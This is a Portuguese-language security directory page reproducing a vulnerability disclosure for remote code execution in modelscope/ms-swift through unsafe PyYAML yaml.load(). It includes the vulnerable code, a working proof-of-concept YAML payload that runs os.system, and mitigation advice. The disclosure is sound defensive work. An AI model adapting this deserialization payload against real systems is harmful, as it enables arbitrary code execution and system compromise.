Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-50460 — Detalhes Técnicos e Exploit para CVE-2025-50460 | Kitploit
Ferramentas/GitHubGitHub/anchor0221/cve-2025-50460
Análise EstáticaAnálise de VulnerabilidadesAnálise de CódigoExploraçãoPapers e PesquisaAprendizado e Educação
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

Detalhes Técnicos e Exploit para CVE-2025-50460

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-50460: Execução Remota de Código no modelscope/ms-swift via desserialização insegura do PyYAML

Status: Aguardando Análise
Este registro CVE foi marcado para esforços de enriquecimento do NVD.

Existe uma vulnerabilidade de execução remota de código (RCE) no projeto ms-swift versão 3.3.0 devido a desserialização insegura em tests/run.py usando yaml.load() da biblioteca PyYAML (versões = 5.3.1). Se um atacante puder controlar o conteúdo do arquivo de configuração YAML passado para o parâmetro --run_config, código arbitrário pode ser executado durante a desserialização. Isso pode levar ao comprometimento total do sistema. A vulnerabilidade é desencadeada quando um arquivo YAML malicioso é carregado, permitindo a execução de comandos Python arbitrários como os.system(). Recomenda-se atualizar o PyYAML para a versão 5.4 ou superior, e usar yaml.safe_load() para mitigar o problema.

Descrição

Uma vulnerabilidade de Execução Remota de Código (RCE) existe no projeto modelscope/ms-swift devido ao uso inseguro de yaml.load() em combinação com versões vulneráveis da biblioteca PyYAML (≤ 5.3.1). O problema reside no script tests/run.py, onde um arquivo de configuração YAML fornecido pelo usuário é desserializado usando yaml.load() com yaml.FullLoader.

Baixar ferramenta

Se um atacante puder controlar ou substituir o arquivo de configuração YAML fornecido ao argumento --run_config, ele pode injetar uma carga maliciosa que resulta em execução de código arbitrário.

Repositório Afetado

  • Projeto: modelscope/ms-swift
  • Versões afetadas: latest
  • Arquivo: tests/run.py
  • Permalink do GitHub: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Dependência: PyYAML <= 5.3.1

Código Vulnerável

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Prova de Conceito (PoC)

Passo 1: Criar arquivo YAML malicioso (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Passo 2: Executar com PyYAML vulnerável (<= 5.3.1)

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

Isso resulta na execução de os.system, comprovando a execução de código.

Mitigação

  • Substituir yaml.load() por yaml.safe_load()
  • Atualizar PyYAML para a versão 5.4 ou posterior

Exemplo de Correção:

root@kitploit:~
# Antes
yaml.load(f, Loader=yaml.FullLoader)

# Depois
yaml.safe_load(f)

Status do CVE

CampoValor
ID do CVECVE-2025-50460
Pontuação CVSSTBD
CWECWE-502: Desserialização de Dados Não Confiáveis
Data do Relatório2025-04-25
Data de Divulgação2025-07-30
Versão Afetadalatest
Versão Corrigida

Autor

  • Descoberto por: Yu Rong (戎誉) e Hao Fan (凡浩)
  • Contato: [[email protected] ]